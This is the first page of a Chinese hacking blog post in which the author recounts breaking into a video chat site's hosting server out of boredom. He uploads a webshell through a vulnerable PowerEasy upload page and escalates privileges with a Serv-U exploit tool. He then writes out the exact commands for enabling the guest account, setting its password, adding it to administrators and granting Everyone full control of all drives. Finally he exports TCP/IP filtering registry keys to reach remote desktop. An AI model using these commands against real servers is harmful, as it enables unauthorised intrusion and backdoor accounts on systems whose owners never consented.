一：得到webshell今天晚上的一次小小测试，由于本人太菜，再高深的技术我也不会，只能这样了..........
一切都已经过去了，没有办法补图了，希望能看的懂这个小帖子。
今天有是无聊的一天，晚上实在无聊没有事情干，就到一个视频聊天站点看秀，嘿嘿~
突然发现一个聊天室特别的火暴，人数已经有500人在里面了（满员了），刷了n次也没有进去..........更加郁闷了！：（
想想反正也是没有事情做，测试一下主机安全做的怎么样吧，呵呵（太菜，说测试人家安全实在是抬高自己了）
在cmd下ping了一下得到了对方的ip，然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点，哈，这下发了，上面有几十个站点，估计我还是能找到一个两个带漏洞的站点的`
经过漫长的查找，终于找到一个动易带漏洞的页面http://www.xxxx.net/Upfile_Soft.asp，上传一个webshell（海阳2005正式版）先（怎么上传我就不罗嗦了，上传工具现在漫天飘了）。

二：成功提升权限建立用户
拿到webshell后高高兴兴的登陆了，突然发现什么权限都没有，只能在自己的webshell所在的目录里面打转（c.d.e.f盘都浏览不了），连删除文件的权限都没有，郁闷呀........
回到〖Server〗下看看主机开了什么服务吧，经过发现他开了终端服务和serv-u服务，哈，这下有搞头了^_^用superscan扫描了一下他的ip，果然通过banner看出他是用的serv-u，版本5.0。
到〖Wscript.Shell〗下面试试看能执行cmd命令不能，输入net user后没有反映，再试通过Wscript.Shell能执行cmd命令不能，再次输入net user后执行返回了对方的user名单，哈哈，这下好了，能拿下了！！
上传serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目录下面，改名为：test.exe，然后回到〖Wscript.Shell〗下执行命令去了，嘿嘿，马上一只肥鸡就要到手了，高兴ing~
通过Wscript.Shell执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest账号，我喜欢用这个账号
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest账号的密码设定为lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest权限到admin权限
好了，账号建立完毕，执行一下net localgroup administrators看看成功没，通过回显知道添加成功了。然后执行netstat -an后看到他开的终端端口是默认的3389，OK，连接试试~

三：解决TCP/IP筛选
连接不上！？晕...........再拿出superscan来扫一下他的3389，根本扫不到........（开了防火墙！？靠，我的点真背.....）
没有办法了，再次回到Wscript.Shell执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t /g everyone:F" #把f盘设置为everyone可以浏览
这下最少可以遍历整个硬盘了，我在硬盘里面到处的翻，找遍了也没有找到他的防火墙文件，这下心里有数了，肯定是他进行TCP/IP筛选了！（当然也有是内网做服务器的可能，具体大家自己可以根据ipconfig -all来判断）
突破TCP/IP筛选我们可以更改他的注册表来实现，我们要做的就是导出他注册表的三处，更改后再导入就可以了，回到〖Wscript.Shell〗执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处

[1] [2] 下一页

上一篇:克隆管理员帐号的方法

下一篇:[资料]网络安全方面的专业词汇

从上传webshell到突破TCP/IP筛选到3389终端登陆相关文章：

·教你学习如何破解XP登陆密码

·QQ空间如何上传照片

·俄罗斯杀毒软件大蜘蛛登陆中国

·视频下载不求人突破封锁保存各类视频资源

·突破网盘限制两招获取Fs2You真实地址

·假期快乐分享，玩转Picasa图片上传

·怎么样清除能突破主动防御的新型木马

·为什么无法登陆无线路由器进行设置？

·利用Google突破封锁:下载想要的东西

·如何“上传图片”到 Google地图

从上传webshell到突破TCP/IP筛选到3389终端登陆相关软件：

·极品美女登陆界面+登录介面更换器

·抢滩登陆 2004简体中文版

·抢滩登陆战 2006

·朱泰祺考研听力高分突破-2005版-1B

·新东方考研词汇50天突破mp3 (04)

·英语发音突破掌上宝

·GRE机考词汇突破

·荣誉勋章:突破

·朱泰祺考研听力高分突破-2005版-4B

·朱泰祺考研听力高分突破-2005版-4A

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.vipcn.net

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved.	鄂ICP备05000083号Powered by:viphot